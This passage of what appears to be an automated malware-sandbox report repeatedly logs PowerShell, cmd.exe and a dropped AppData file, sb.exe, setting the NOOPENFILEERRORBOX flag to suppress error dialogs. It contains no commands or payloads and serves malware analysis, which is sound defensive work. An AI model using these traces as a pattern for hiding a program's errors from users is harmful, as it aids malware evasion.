Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
